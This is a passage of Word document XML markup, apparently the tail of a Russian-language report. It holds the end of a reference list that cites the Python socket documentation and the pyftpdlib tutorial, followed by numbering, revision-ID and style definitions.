        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – [Электронный ресурс] – Режим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1079C48B" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="00C750BB" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>docs</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>python</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/3/</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>library</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>socket</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A75CE42" w14:textId="77777777" w:rsidR="005E6671" w:rsidRDefault="005E6671" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дата доступа: 30.06.2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04767194" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="005E6671" w:rsidP="005E6671">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tutorial</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pyftpdlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – [Электронный ресурс] – Режим доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFE5B3" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="00C750BB" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://pyftpdlib.readthedocs.io/en/latest/tutorial.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="644BE0F0" w14:textId="77777777" w:rsidR="005E6671" w:rsidRDefault="005E6671" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Дата доступа: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.06.2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E013A04" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="005E6671" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201B9BB3" w14:textId="77777777" w:rsidR="005E6671" w:rsidRDefault="005E6671" w:rsidP="007A202D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E30D93F" w14:textId="77777777" w:rsidR="005E6671" w:rsidRDefault="005E6671" w:rsidP="007A202D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130B4112" w14:textId="77777777" w:rsidR="005E6671" w:rsidRDefault="005E6671" w:rsidP="007A202D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CC1AB1" w14:textId="77777777" w:rsidR="007A202D" w:rsidRPr="005E6671" w:rsidRDefault="007A202D" w:rsidP="007A202D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E28D941" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="005E6671" w:rsidP="00163263">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidSect="00723F26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C2B0B" w14:textId="77777777" w:rsidR="00C750BB" w:rsidRDefault="00C750BB" w:rsidP="0054305F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2213026F" w14:textId="77777777" w:rsidR="00C750BB" w:rsidRDefault="00C750BB" w:rsidP="0054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9249316"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="08945A73" w14:textId="77777777" w:rsidR="00B9168E" w:rsidRDefault="00B9168E">
        <w:pPr>
          <w:pStyle w:val="a8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E5EA5E6" w14:textId="77777777" w:rsidR="00B9168E" w:rsidRDefault="00B916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A113E" w14:textId="77777777" w:rsidR="00C750BB" w:rsidRDefault="00C750BB" w:rsidP="0054305F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1B9DE3DB" w14:textId="77777777" w:rsidR="00C750BB" w:rsidRDefault="00C750BB" w:rsidP="00543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DA9E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E797B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A42D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847577"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E4E48E2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D73D0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C725B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F7D4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55A0470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953A84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C9C3D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3683F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF6C75F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5326B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CC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00533"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D80E688"/>
    <w:lvl w:ilvl="0" w:tplc="B4CC701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9033F30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C9C3D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910B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0580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C6C9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A44FA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F10F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4126D7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D44424"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3964D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9666BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB4E45A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6D233F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DA0763C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B15E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E82A95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D483FF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3272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B1C0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D7E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C16024"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16285586"/>
    <w:lvl w:ilvl="0" w:tplc="04190001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="17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20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E9A5956"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05A60D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15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="16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25"/>
    <w:rsid w:val="00001562"/>
    <w:rsid w:val="0000203F"/>
    <w:rsid w:val="0001026E"/>
    <w:rsid w:val="000114BD"/>
    <w:rsid w:val="000322C8"/>
    <w:rsid w:val="00035299"/>
    <w:rsid w:val="00036D48"/>
    <w:rsid w:val="00052327"/>
    <w:rsid w:val="00063374"/>
    <w:rsid w:val="0006745A"/>
    <w:rsid w:val="0008244A"/>
    <w:rsid w:val="00090C5C"/>
    <w:rsid w:val="00096D05"/>
    <w:rsid w:val="000A17BA"/>
    <w:rsid w:val="000B2256"/>
    <w:rsid w:val="000B3BE9"/>
    <w:rsid w:val="000C4258"/>
    <w:rsid w:val="000D2725"/>
    <w:rsid w:val="000E27A7"/>
    <w:rsid w:val="001107F0"/>
    <w:rsid w:val="00127539"/>
    <w:rsid w:val="00134290"/>
    <w:rsid w:val="00141563"/>
    <w:rsid w:val="00146762"/>
    <w:rsid w:val="00154470"/>
    <w:rsid w:val="00156F5C"/>
    <w:rsid w:val="00163263"/>
    <w:rsid w:val="00180BF9"/>
    <w:rsid w:val="00183461"/>
    <w:rsid w:val="001878A5"/>
    <w:rsid w:val="00193D7A"/>
    <w:rsid w:val="00195B14"/>
    <w:rsid w:val="001A3E7F"/>
    <w:rsid w:val="001B187E"/>
    <w:rsid w:val="001B566A"/>
    <w:rsid w:val="001C0E58"/>
    <w:rsid w:val="001C65BA"/>
    <w:rsid w:val="001C664C"/>
    <w:rsid w:val="001E2913"/>
    <w:rsid w:val="001F0134"/>
    <w:rsid w:val="001F5C0C"/>
    <w:rsid w:val="001F5CE3"/>
    <w:rsid w:val="00207448"/>
    <w:rsid w:val="00207FAB"/>
    <w:rsid w:val="00211BF7"/>
    <w:rsid w:val="00215A86"/>
    <w:rsid w:val="00223354"/>
    <w:rsid w:val="00233C23"/>
    <w:rsid w:val="002529F8"/>
    <w:rsid w:val="0026412E"/>
    <w:rsid w:val="002647C5"/>
    <w:rsid w:val="00272DE1"/>
    <w:rsid w:val="00282CAE"/>
    <w:rsid w:val="00290B7D"/>
    <w:rsid w:val="00292DF5"/>
    <w:rsid w:val="00295303"/>
    <w:rsid w:val="002A2F77"/>
    <w:rsid w:val="002F14EC"/>
    <w:rsid w:val="00317461"/>
    <w:rsid w:val="003219B3"/>
    <w:rsid w:val="00324EA3"/>
    <w:rsid w:val="0032740B"/>
    <w:rsid w:val="00340332"/>
    <w:rsid w:val="00340A30"/>
    <w:rsid w:val="0035135E"/>
    <w:rsid w:val="0035374D"/>
    <w:rsid w:val="00357274"/>
    <w:rsid w:val="00360450"/>
    <w:rsid w:val="0037274C"/>
    <w:rsid w:val="003764AF"/>
    <w:rsid w:val="00391C6D"/>
    <w:rsid w:val="003B0395"/>
    <w:rsid w:val="003D0669"/>
    <w:rsid w:val="003D7404"/>
    <w:rsid w:val="003E651E"/>
    <w:rsid w:val="003E704C"/>
    <w:rsid w:val="003F0EA7"/>
    <w:rsid w:val="003F248D"/>
    <w:rsid w:val="003F6AF6"/>
    <w:rsid w:val="00407F7E"/>
    <w:rsid w:val="00415513"/>
    <w:rsid w:val="00420189"/>
    <w:rsid w:val="00425B32"/>
    <w:rsid w:val="00450514"/>
    <w:rsid w:val="0046215C"/>
    <w:rsid w:val="00475850"/>
    <w:rsid w:val="004858EE"/>
    <w:rsid w:val="00485976"/>
    <w:rsid w:val="00486544"/>
    <w:rsid w:val="004872AB"/>
    <w:rsid w:val="004A3859"/>
    <w:rsid w:val="004B18D4"/>
    <w:rsid w:val="004C2E9F"/>
    <w:rsid w:val="004E0202"/>
    <w:rsid w:val="004E187A"/>
    <w:rsid w:val="004F449A"/>
    <w:rsid w:val="004F646A"/>
    <w:rsid w:val="004F6A75"/>
    <w:rsid w:val="00503CF5"/>
    <w:rsid w:val="0050460B"/>
    <w:rsid w:val="005337A5"/>
    <w:rsid w:val="005405CF"/>
    <w:rsid w:val="0054305F"/>
    <w:rsid w:val="00552290"/>
    <w:rsid w:val="00573F16"/>
    <w:rsid w:val="0058509F"/>
    <w:rsid w:val="005B52F7"/>
    <w:rsid w:val="005C70EA"/>
    <w:rsid w:val="005C7EBB"/>
    <w:rsid w:val="005E6671"/>
    <w:rsid w:val="005F786E"/>
    <w:rsid w:val="00615208"/>
    <w:rsid w:val="00626BB9"/>
    <w:rsid w:val="00630D67"/>
    <w:rsid w:val="00633C0A"/>
    <w:rsid w:val="0066178E"/>
    <w:rsid w:val="006735A6"/>
    <w:rsid w:val="0067750B"/>
    <w:rsid w:val="006805E4"/>
    <w:rsid w:val="0068212E"/>
    <w:rsid w:val="00682657"/>
    <w:rsid w:val="006A5C0D"/>
    <w:rsid w:val="006B3ECB"/>
    <w:rsid w:val="006C5546"/>
    <w:rsid w:val="006C6582"/>
    <w:rsid w:val="006D560A"/>
    <w:rsid w:val="006F4757"/>
    <w:rsid w:val="00703445"/>
    <w:rsid w:val="00723F26"/>
    <w:rsid w:val="00731E40"/>
    <w:rsid w:val="00742F67"/>
    <w:rsid w:val="00753689"/>
    <w:rsid w:val="00756350"/>
    <w:rsid w:val="0076056E"/>
    <w:rsid w:val="007724E0"/>
    <w:rsid w:val="007727F4"/>
    <w:rsid w:val="0077353C"/>
    <w:rsid w:val="007754EA"/>
    <w:rsid w:val="00777C2C"/>
    <w:rsid w:val="00786ABF"/>
    <w:rsid w:val="00792308"/>
    <w:rsid w:val="007A18C6"/>
    <w:rsid w:val="007A202D"/>
    <w:rsid w:val="007B2EE3"/>
    <w:rsid w:val="007E7018"/>
    <w:rsid w:val="007F096C"/>
    <w:rsid w:val="007F163F"/>
    <w:rsid w:val="007F4B3A"/>
    <w:rsid w:val="008035F4"/>
    <w:rsid w:val="00810C6F"/>
    <w:rsid w:val="00811C30"/>
    <w:rsid w:val="008142CD"/>
    <w:rsid w:val="00822837"/>
    <w:rsid w:val="0084244D"/>
    <w:rsid w:val="00847E31"/>
    <w:rsid w:val="00873682"/>
    <w:rsid w:val="00875950"/>
    <w:rsid w:val="00890022"/>
    <w:rsid w:val="00893F47"/>
    <w:rsid w:val="008C6E89"/>
    <w:rsid w:val="008D3C85"/>
    <w:rsid w:val="008D71DF"/>
    <w:rsid w:val="008E1BF7"/>
    <w:rsid w:val="008E61F4"/>
    <w:rsid w:val="00900A22"/>
    <w:rsid w:val="009161A5"/>
    <w:rsid w:val="0092356E"/>
    <w:rsid w:val="00923ADE"/>
    <w:rsid w:val="00930A53"/>
    <w:rsid w:val="0094734B"/>
    <w:rsid w:val="009473F0"/>
    <w:rsid w:val="00951E3A"/>
    <w:rsid w:val="00952EE7"/>
    <w:rsid w:val="009553D0"/>
    <w:rsid w:val="0098005B"/>
    <w:rsid w:val="00980127"/>
    <w:rsid w:val="0099438F"/>
    <w:rsid w:val="009A6CED"/>
    <w:rsid w:val="009D378C"/>
    <w:rsid w:val="009D3AC6"/>
    <w:rsid w:val="009D7D6C"/>
    <w:rsid w:val="009E5AB9"/>
    <w:rsid w:val="009E62AF"/>
    <w:rsid w:val="009F190A"/>
    <w:rsid w:val="00A04ABC"/>
    <w:rsid w:val="00A20C4E"/>
    <w:rsid w:val="00A27510"/>
    <w:rsid w:val="00A35E0D"/>
    <w:rsid w:val="00A40500"/>
    <w:rsid w:val="00A4408C"/>
    <w:rsid w:val="00A569AF"/>
    <w:rsid w:val="00A85BEC"/>
    <w:rsid w:val="00A86F65"/>
    <w:rsid w:val="00AC075A"/>
    <w:rsid w:val="00AC2B6F"/>
    <w:rsid w:val="00AC75F5"/>
    <w:rsid w:val="00AF1A05"/>
    <w:rsid w:val="00AF7A75"/>
    <w:rsid w:val="00B11552"/>
    <w:rsid w:val="00B146B4"/>
    <w:rsid w:val="00B411C0"/>
    <w:rsid w:val="00B53882"/>
    <w:rsid w:val="00B64ACF"/>
    <w:rsid w:val="00B77291"/>
    <w:rsid w:val="00B8142A"/>
    <w:rsid w:val="00B9168E"/>
    <w:rsid w:val="00BA0171"/>
    <w:rsid w:val="00BD1F70"/>
    <w:rsid w:val="00BD77D3"/>
    <w:rsid w:val="00BE0D7F"/>
    <w:rsid w:val="00BE54EE"/>
    <w:rsid w:val="00C0242E"/>
    <w:rsid w:val="00C11625"/>
    <w:rsid w:val="00C14F83"/>
    <w:rsid w:val="00C21D80"/>
    <w:rsid w:val="00C22583"/>
    <w:rsid w:val="00C341E7"/>
    <w:rsid w:val="00C36F06"/>
    <w:rsid w:val="00C37F2D"/>
    <w:rsid w:val="00C563E3"/>
    <w:rsid w:val="00C6316A"/>
    <w:rsid w:val="00C71115"/>
    <w:rsid w:val="00C750BB"/>
    <w:rsid w:val="00C82D53"/>
    <w:rsid w:val="00C8657F"/>
    <w:rsid w:val="00C91803"/>
    <w:rsid w:val="00C93692"/>
    <w:rsid w:val="00CA19C8"/>
    <w:rsid w:val="00CA531F"/>
    <w:rsid w:val="00CC105F"/>
    <w:rsid w:val="00CD1599"/>
    <w:rsid w:val="00CD3BA7"/>
    <w:rsid w:val="00CD560C"/>
    <w:rsid w:val="00CE01FF"/>
    <w:rsid w:val="00CE6EFF"/>
    <w:rsid w:val="00CF25E9"/>
    <w:rsid w:val="00CF3F87"/>
    <w:rsid w:val="00CF779F"/>
    <w:rsid w:val="00D0130C"/>
    <w:rsid w:val="00D05DF5"/>
    <w:rsid w:val="00D17A37"/>
    <w:rsid w:val="00D208A6"/>
    <w:rsid w:val="00D53C43"/>
    <w:rsid w:val="00D6129A"/>
    <w:rsid w:val="00D62194"/>
    <w:rsid w:val="00D648A1"/>
    <w:rsid w:val="00D918E7"/>
    <w:rsid w:val="00D96A2E"/>
    <w:rsid w:val="00DB6C2B"/>
    <w:rsid w:val="00DC72A7"/>
    <w:rsid w:val="00DE11E0"/>
    <w:rsid w:val="00DF09EE"/>
    <w:rsid w:val="00E20A87"/>
    <w:rsid w:val="00E24C33"/>
    <w:rsid w:val="00E32FED"/>
    <w:rsid w:val="00E35091"/>
    <w:rsid w:val="00E46233"/>
    <w:rsid w:val="00E46359"/>
    <w:rsid w:val="00E50B74"/>
    <w:rsid w:val="00E608A2"/>
    <w:rsid w:val="00E80D2F"/>
    <w:rsid w:val="00EB2B7B"/>
    <w:rsid w:val="00EC00F3"/>
    <w:rsid w:val="00EC67C5"/>
    <w:rsid w:val="00F17B2E"/>
    <w:rsid w:val="00F17F4B"/>
    <w:rsid w:val="00F22A0D"/>
    <w:rsid w:val="00F22B9B"/>
    <w:rsid w:val="00F673F0"/>
    <w:rsid w:val="00F67B99"/>
    <w:rsid w:val="00F71782"/>
    <w:rsid w:val="00F72988"/>
    <w:rsid w:val="00FA0359"/>
    <w:rsid w:val="00FB024C"/>
    <w:rsid w:val="00FB5D08"/>
    <w:rsid w:val="00FB6FCC"/>
    <w:rsid w:val="00FD0BE2"/>
    <w:rsid w:val="00FD2BF8"/>
    <w:rsid w:val="00FD3558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B44CB"/>
  <w15:docId w15:val="{E12640F3-DC87-4A18-B95E-817A5B29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A3E7F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BA0171"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bC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15513"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i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537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A3E7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A017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a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00573F16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673F0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005430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54305F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0054305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54305F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003764AF"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003764A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3764AF"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Calibri" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
